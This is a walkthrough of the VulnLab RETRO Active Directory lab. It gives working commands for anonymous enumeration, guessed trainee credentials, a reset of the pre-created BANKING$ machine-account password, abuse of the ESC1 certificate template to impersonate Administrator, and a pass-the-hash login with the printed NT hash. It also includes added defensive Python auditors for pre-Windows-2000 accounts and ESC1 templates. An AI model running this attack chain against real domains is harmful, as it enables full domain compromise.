This is the write-up/walkthrough of the RETRO Active Directory machine from VulnLab.
Note: the IP address differs between commands because stopping and starting the machine assigns a new IP every time.
NMAP SCAN:
53/tcp   open domain        syn-ack Simple DNS Plus
88/tcp   open kerberos-sec  syn-ack Microsoft Windows Kerberos (server time: 2023-08-14 18:32:06Z)
135/tcp  open msrpc         syn-ack Microsoft Windows RPC
139/tcp  open netbios-ssn   syn-ack Microsoft Windows netbios-ssn
389/tcp  open ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Issuer: commonName=retro-DC-CA/domainComponent=retro
SNIP
445/tcp  open microsoft-ds? syn-ack
464/tcp  open kpasswd5?     syn-ack
593/tcp  open ncacn_http    syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp  open ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3268/tcp open ldap          syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.re
3269/tcp open ssl/ldap      syn-ack Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
| rdp-ntlm-info:
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2023-08-14T18:32:48+00:00
|_ssl-date: 2023-08-14T18:33:28+00:00; +2s from scanner time.
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 12722/tcp): CLEAN (Timeout)
|   Check 2 (port 26063/tcp): CLEAN (Timeout)
|   Check 3 (port 31296/udp): CLEAN (Timeout)
|   Check 4 (port 53820/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
|   date: 2023-08-14T18:32:49
|_  start_date: N/A
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
Domain: retro.vl, NetBIOS name: DC
Looking for SMB shares, I found that only the Trainees share is readable without credentials.

Found an Important.txt file on the Trainees share, saying:

Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
The message says everyone struggles with strong and unique passwords, so the admins put everyone on one shared account, which probably has an easy password.
Enumerating users with impacket-lookupsid (lookupsid.py) as an anonymous user with a blank password:
impacket-lookupsid anonymous@10.10.81.153

Users found:
trainee
BANKING$
jburley
HelpDesk
tblack
krbtgt
As hinted in Important.txt, I tried authenticating to SMB with the username “trainee” and password “trainee”; with that I can now read the Notes share.

Logged in with smbclient and downloaded the ToDo.txt file:
smbclient //10.10.115.87/Notes -U trainee%trainee

The note says:
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
The note refers to a pre-created computer account. Searching for “pre created computer account” led to this blog, which explains how pre-created computer accounts can be abused.
I had already found the BANKING$ machine account with lookupsid, so I tried changing its password.
Using changepasswd.py to change the password of the BANKING$ machine account, authenticating with trainee as the alternative user and setting a new password for BANKING$:
python3 changepasswd.py retro.vl/banking$:banking@10.10.81.153 -altuser trainee -altpass trainee -newpass hacker@123

It worked: the password of the BANKING$ machine account was changed.
After that I tried bloodhound-python with the trainee and machine accounts, but it failed with a DNS error, so I moved on to enumerating certificate templates with certipy:
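From the defender's side, the account the note describes is found by its userAccountControl bits rather than by guessing passwords. The following auditor is an added example written for this write-up (not code from VulnLab or from the blog it cites): it takes an export of computer accounts and reports those carrying the “pre-Windows 2000 computer” flag, splitting them into never-joined, joined and disabled so each gets the right fix. The account records are constructed sample data, the bit values are the documented Microsoft constants, and treating logonCount == 0 as “never joined” is a heuristic I assume here.

```python
"""Audit computer accounts for the "pre-Windows 2000 computer" flag.

Added example for this write-up, not code from VulnLab or the blog it cites.
The account records are constructed sample data shaped like the LDAP
attributes an auditor would export; the userAccountControl bit values are the
documented Microsoft constants. Treating logonCount == 0 as "never joined"
is a heuristic assumed here, not something the write-up states.
"""
from dataclasses import dataclass

UF_ACCOUNTDISABLE = 0x0002
UF_PASSWD_NOTREQD = 0x0020             # set when "pre-Windows 2000 computer" is ticked
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000  # member workstation/server
UF_SERVER_TRUST_ACCOUNT = 0x2000       # domain controller
UF_TRUSTED_FOR_DELEGATION = 0x80000

# Filter that pulls the same accounts straight from a DC with any LDAP client
# (1.2.840.113556.1.4.803 is the bitwise-AND matching rule).
LDAP_FILTER = "(&(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=32))"


@dataclass(frozen=True)
class ComputerAccount:
    sam_account_name: str
    user_account_control: int
    logon_count: int


def classify(acct):
    """Return a finding for an account that needs attention, or None if it is fine."""
    uac = acct.user_account_control
    if uac & UF_SERVER_TRUST_ACCOUNT:
        return None  # domain controllers are out of scope for this check
    if not uac & UF_PASSWD_NOTREQD:
        return None  # normal computer account: password was set at domain join
    if uac & UF_ACCOUNTDISABLE:
        return "pre-Windows 2000 flag set on a disabled account: delete it"
    if acct.logon_count == 0:
        return "pre-created and never joined: password is still the creation default, reset or delete"
    return "pre-Windows 2000 flag set on a joined machine: clear PASSWD_NOTREQD"


def audit(accounts):
    """Map each flagged account name to its finding; clean accounts are omitted."""
    return {a.sam_account_name: finding
            for a in accounts if (finding := classify(a)) is not None}


# Constructed sample export; BANKING$ mirrors the account found in the write-up.
SAMPLE_ACCOUNTS = [
    ComputerAccount("DC$", UF_SERVER_TRUST_ACCOUNT | UF_TRUSTED_FOR_DELEGATION, 4123),
    ComputerAccount("WS01$", UF_WORKSTATION_TRUST_ACCOUNT, 57),
    ComputerAccount("BANKING$", UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD, 0),
    ComputerAccount("LEGACY01$", UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD, 19),
    ComputerAccount("OLD$", UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD | UF_ACCOUNTDISABLE, 0),
]

if __name__ == "__main__":
    for name, finding in audit(SAMPLE_ACCOUNTS).items():
        print(f"{name:12} {finding}")
```

Run against a real export, the same three buckets apply: a never-joined account is the one an attacker can take over as described above, a joined machine only needs the flag cleared, and a disabled leftover should simply be removed.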
certipy find -u 'banking$'@retro.vl -p hacker@123 -dc-ip 10.10.115.87

cat 20230815033909_Certipy.txt
Certipy flags the “RetroClients” template as vulnerable to ESC1: I am authenticating as a computer account, and Domain Computers have enrollment rights on it.
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 1 year
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
        Write Owner Principals          : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Dacl Principals           : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
        Write Property Principals       : RETRO.VL\Domain Admins
                                          RETRO.VL\Enterprise Admins
                                          RETRO.VL\Administrator
    [!] Vulnerabilities
      ESC1                              : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
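To make the ESC1 verdict reproducible on any template dump, here is an added example (not the page's or certipy's own code) that parses a certipy template summary like the one above, returns the low-privilege principals that satisfy every ESC1 condition at once, and then shows that correcting the two template settings clears the finding. The template text is abridged from the output above and embedded as constructed sample input; which groups count as low-privilege is my assumption.

```python
"""Flag the ESC1 conditions in a certipy 'find' template summary.

Added example for this write-up, not code from the certipy project. The
template text is abridged from the certipy output shown above; the list of
low-privilege enrollment principals is an assumption.
"""
import copy

# Principals that should not hold enrollment rights on a template that lets
# the enrollee pick the subject of a client-authentication certificate.
LOW_PRIV_PRINCIPALS = {"domain computers", "domain users",
                       "authenticated users", "everyone"}

# Lines in certipy's text report that are headers, not "key : value" pairs.
SECTION_HEADERS = {"Certificate Templates", "Permissions",
                   "Enrollment Permissions", "Object Control Permissions"}

SAMPLE_TEMPLATE = r"""
Certificate Templates
  0
    Template Name                       : RetroClients
    Display Name                        : Retro Clients
    Certificate Authorities             : retro-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Extended Key Usage                  : Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Minimum RSA Key Length              : 4096
    Permissions
      Enrollment Permissions
        Enrollment Rights               : RETRO.VL\Domain Admins
                                          RETRO.VL\Domain Computers
                                          RETRO.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : RETRO.VL\Administrator
"""


def parse_template(text):
    """Parse one template block into {field: [values]}.

    Multi-valued fields such as Enrollment Rights continue on following lines
    that carry no ':'; those are appended to the last field seen.
    """
    fields = {}
    last = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in SECTION_HEADERS or line.isdigit():
            continue
        if ":" in line:
            key, _, value = line.partition(":")
            last = key.strip()
            fields[last] = [value.strip()]
        elif last is not None:
            fields[last].append(line)
    return fields


def _flag(fields, key):
    return fields.get(key, [""])[0].strip().lower() == "true"


def esc1_exposed_principals(fields):
    """Low-privilege principals that meet every ESC1 condition on this template.

    An empty list means the template is not ESC1-exposed.
    """
    if not _flag(fields, "Enabled") or not _flag(fields, "Client Authentication"):
        return []
    if not _flag(fields, "Enrollee Supplies Subject"):
        return []
    if _flag(fields, "Requires Manager Approval"):
        return []
    if fields.get("Authorized Signatures Required", ["0"])[0] != "0":
        return []
    rights = fields.get("Enrollment Rights", [])
    principals = {p.rsplit("\\", 1)[-1].lower() for p in rights}
    return sorted(principals & LOW_PRIV_PRINCIPALS)


def hardened(fields):
    """Copy of the template with the settings that close ESC1 corrected:
    the CA builds the subject from AD, and issuance needs manager approval."""
    fixed = copy.deepcopy(fields)
    fixed["Enrollee Supplies Subject"] = ["False"]
    fixed["Requires Manager Approval"] = ["True"]
    return fixed


if __name__ == "__main__":
    tpl = parse_template(SAMPLE_TEMPLATE)
    print(tpl["Template Name"][0], "ESC1 via:", esc1_exposed_principals(tpl))
    print("after hardening:", esc1_exposed_principals(hardened(tpl)))
```

Either of the two changes in hardened() alone would already close ESC1; removing Domain Computers from the enrollment rights is a third option when computer certificates are not needed from this template at all.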
Requesting a certificate from the “RetroClients” template for the Administrator **UPN (User Principal Name)**, with the key size set to 4096 as required by “Minimum RSA Key Length”.
Note: make sure dc.retro.vl and retro.vl are added to /etc/hosts.
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug

After getting the .pfx file (certificate plus private key), I used certipy to authenticate to the DC with it:
certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.104.45

After entering the command, certipy asked me to select between “UPN” and “DNS Host Name”; I chose UPN by entering 0 and got the NT hash of the administrator account. I then tried logging in over RDP with pass-the-hash, but blank-password logon was not allowed, and evil-winrm did not respond either. There are still many other ways to log in as administrator with the hash.
Used impacket-wmiexec to log in as administrator with pass-the-hash (PTH) and got a shell as administrator:
impacket-wmiexec administrator@10.10.104.45 -hashes aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
